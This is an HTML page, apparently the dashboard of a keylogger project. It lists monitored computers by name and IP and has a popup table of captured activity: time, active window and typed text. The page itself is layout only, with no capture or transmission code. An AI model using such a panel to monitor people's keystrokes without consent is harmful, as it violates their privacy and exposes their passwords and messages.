<!DOCTYPE html>
<html lang="en" dir="ltr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Key logger Dashboard</title>
    <link rel="stylesheet" href="index.css">
    
</head>
<body>
    <header>
        <h1>Key logger Dashboard</h1>
        <button onclick="fetchLogs()">refresh data</button>
        <button id="logout">Logout</button>
        
    </header>

    <main>
        <aside>
            <h2>menu</h2>
            <ul>
                <li><a class="MenuItem" href="#">Dashboard</a></li>
                <li><a class="MenuItem" href="#">Activity analysis</a></li>
                <li><a class="MenuItem" href="#">settings</a></li>
            </ul>
        </aside>
        
        
        

        <section class="ComputersList" id="ComputersList">
            <h2>Computers List</h2>
            <table id="ComputersTable">
                <thead>
                    <tr>
                        <th>id</th>
                        <th>Name</th>
                        <th>IP</th>
                        <th>Active</th>
                    </tr>
                </thead>
                <tbody id="ComputersTableBody">
                    <!-- <tr><td>.</td></tr> -->
                </tbody>
            </table>
        </section>
        <div id="overlay"></div>
        <section class="ComputerActivity" id="ComputerActivity">
            <button id="closePopup" aria-label="סגור">×</button>
            <h2>Computer Activity</h2>
            <table>
                <thead>
                    <tr>
                        <th>time</th>
                        <th>window</th>
                        <th>text</th>
                    </tr>
                </thead>
                <tbody id="ActivityTable">
                    <!-- <tr><td>.</td></tr> -->
                </tbody>
            </table>
        </section>
    </main>
    <script src="index.js"></script>
</body>
</html>
